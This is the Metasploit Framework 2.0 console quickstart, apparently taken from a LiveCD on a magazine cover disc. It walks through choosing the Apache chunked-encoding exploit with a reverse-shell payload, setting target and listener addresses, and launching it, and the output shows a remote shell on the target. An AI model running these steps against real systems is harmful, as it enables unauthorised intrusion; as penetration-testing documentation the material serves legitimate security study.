home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / docs / QUICKSTART.msfconsole < prev    next >
Text File  |  2006-06-30  |  7KB  |  179 lines

  1. 1) Start up the console
  2.  
  3. hdm@slasher framework $ ./msfconsole
  4.                                                                                                                 
  5. + -- --=[ msfconsole v2.0 [20 exploits - 27 payloads]
  6.  
  7. msf>
  8.  
  9.  
  10. 2) Show available exploits
  11.  
  12. msf > show exploits
  13.                                                                                                                 
  14. Metasploit Framework Loaded Exploits
  15. ====================================
  16.                                                                                                                 
  17.   PoPToP_Negative_Read         PoPToP Negative Read Overflow
  18.   apache_chunked_win32         Apache Win32 Chunked Encoding
  19.   exchange2000_xexch50         Exchange 2000 MS03-46 Heap Overflow
  20.   frontpage_fp30reg_chunked    Frontpage fp30reg.dll Chunked Encoding
  21.   ia_webmail                   IA WebMail 3.x Buffer Overflow
  22.   iis50_nsiislog_post          IIS 5.0 nsiislog.dll POST Overflow
  23.   iis50_printer_overflow       IIS 5.0 Printer Buffer Overflow
  24.   iis50_webdav_ntdll           IIS 5.0 WebDAV ntdll.dll Overflow
  25.   msrpc_dcom_ms03_026_win2kxp  Microsoft RPC DCOM MSO3-026 NT 2K/XP
  26.   msrpc_dcom_ms03_026_winnt    Microsoft RPC DCOM MSO3-026 NT 4.0
  27.   mssql2000_resolution         MSSQL 2000 Resolution Overflow
  28.   realserver_describe_linux    RealServer Describe Buffer Overflow
  29.   samba_trans2open             Samba trans2open Overflow
  30.   solaris_sadmind_exec         Solaris sadmind Remote Exec
  31.   warftpd_165_pass             War-FTPD 1.65 PASS Overflow
  32.  
  33.  
  34.  
  35. 3) Show available payloads
  36.  
  37. msf > show payloads
  38.                                                                                                                 
  39. Metasploit Framework Loaded Payloads
  40. ====================================
  41.                                                                                                                 
  42.   bsdx86bind           Listen for connection and spawn a shell
  43.   bsdx86findsock       Spawn a shell on the established connection
  44.   bsdx86reverse        Connect back to attacker and spawn a shell
  45.   cmd_generic          Run a specific command on the remote system
  46.   cmd_sol_bind         Use inetd to create a persistent bindshell
  47.   cmd_unix_reverse     Use telnet|sh|telnet to simulate reverse shell
  48.   linx86bind           Listen for connection and spawn a shell
  49.   linx86bind_ie        Listen for connection and spawn a shell
  50.   linx86findsock       Spawn a shell on the established connection
  51.   linx86reverse        Connect back to attacker and spawn a shell
  52.   linx86reverse_ie     Connect back to attacker and spawn a shell
  53.   linx86reverse_imp    Connect back to attacker and download impurity module
  54.   linx86reverse_xor    Connect back to attacker and spawn an encrypted shell
  55.   solx86bind           Listen for connection and spawn a shell
  56.   solx86findsock       Spawn a shell on the established connection
  57.   solx86reverse        Connect back to attacker and spawn a shell
  58.   winadduser           Create admin user X with pass X
  59.   winbind              Listen for connection and spawn a shell
  60.   winreverse           Connect back to attacker and spawn a shell
  61.  
  62.  
  63. 3) Select your favorite exploit
  64.  
  65. msf > use apache_chunked_win32
  66. msf apache_chunked_win32 >
  67.  
  68.  
  69.  
  70. 4) Show available targets for this exploit
  71.  
  72. msf apache_chunked_win32 > show targets
  73.                                                                                                                 
  74. Supported Exploit Targets
  75. =========================
  76.                                                                                                                 
  77.   0  Windows NT/2K Brute Force
  78.   1  Windows 2000
  79.   2  Windows NT
  80.  
  81.  
  82.  
  83. 5) Select the appropriate target value
  84.  
  85. msf apache_chunked_win32 > set TARGET 2
  86. TARGET -> 2
  87.  
  88.  
  89.  
  90. 6) Show payloads that work with this exploit
  91.  
  92. msf apache_chunked_win32 > show payloads
  93.                                                                                                                 
  94. Metasploit Framework Usable Payloads
  95. ====================================
  96.                                                                                                                 
  97.   winadduser    Create admin user X with pass X
  98.   winbind       Listen for connection and spawn a shell
  99.   winreverse    Connect back to attacker and spawn a shell
  100.  
  101.  
  102.  
  103. 7) Select your desired payload for the target
  104.  
  105. msf apache_chunked_win32 > set PAYLOAD winreverse
  106. PAYLOAD -> winreverse
  107.  
  108.  
  109.  
  110. 8) Show available options
  111.  
  112. msf apache_chunked_win32 > show options
  113.                                                                                                                 
  114. Exploit and Payload Options
  115. ===========================
  116.                                                                                                                 
  117.   Exploit:    Name      Default    Description
  118.   --------    ------    -------    ------------------
  119.   optional    SSL                  Use SSL
  120.   required    RHOST                The target address
  121.   required    RPORT     80         The target port
  122.                                                                                                                 
  123.   Payload:    Name        Default    Description
  124.   --------    --------    -------    ------------------------------------------
  125.   optional    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
  126.   required    LHOST                  Local address to receive connection
  127.   required    LPORT                  Local port to receive connection
  128.                                                                                                                 
  129.  
  130.  
  131. 9) Show the optional advanced options
  132.  
  133. msf apache_chunked_win32 > show advanced
  134.                                                                                                                 
  135. Exploit and Payload Advanced Options
  136. ====================================
  137.                                                                                                                 
  138.   Payload (Msf::Payload::win32_reverse):
  139.   --------------------------------------
  140.                                                                                                                 
  141.   Exploit (Msf::Exploit::apache_chunked_win32):
  142.   ---------------------------------------------
  143.  
  144. (this exploit and payload set have no advanced options)
  145.  
  146.  
  147.  
  148. 10) Set all required options
  149.  
  150. msf apache_chunked_win32 > set RHOST 192.168.1.241
  151. RHOST -> 192.168.1.241
  152. msf apache_chunked_win32 > set RPORT 8080
  153. RPORT -> 8080
  154. msf apache_chunked_win32 > set LHOST 192.168.1.244
  155. LHOST -> 192.168.1.244
  156. msf apache_chunked_win32 > set LPORT 4444
  157. LPORT -> 4444
  158.  
  159.  
  160.  
  161. 12) Perform a vulnerability check
  162.  
  163. msf apache_chunked_win32 > check
  164. [*] Vulnerable server 'Apache/1.3.22 (Win32)'
  165.  
  166.  
  167.  
  168. 13) Launch the actual exploit :)
  169.  
  170. msf apache_chunked_win32 > exploit
  171. [*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
  172. [*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
  173. [*] Connection from 192.168.1.241:1036...
  174.                                                                                                                 
  175. Microsoft(R) Windows NT(TM)
  176. (C) Copyright 1985-1996 Microsoft Corp.
  177.                                                                                                                 
  178. c:\program files\apache group\apache>
  179.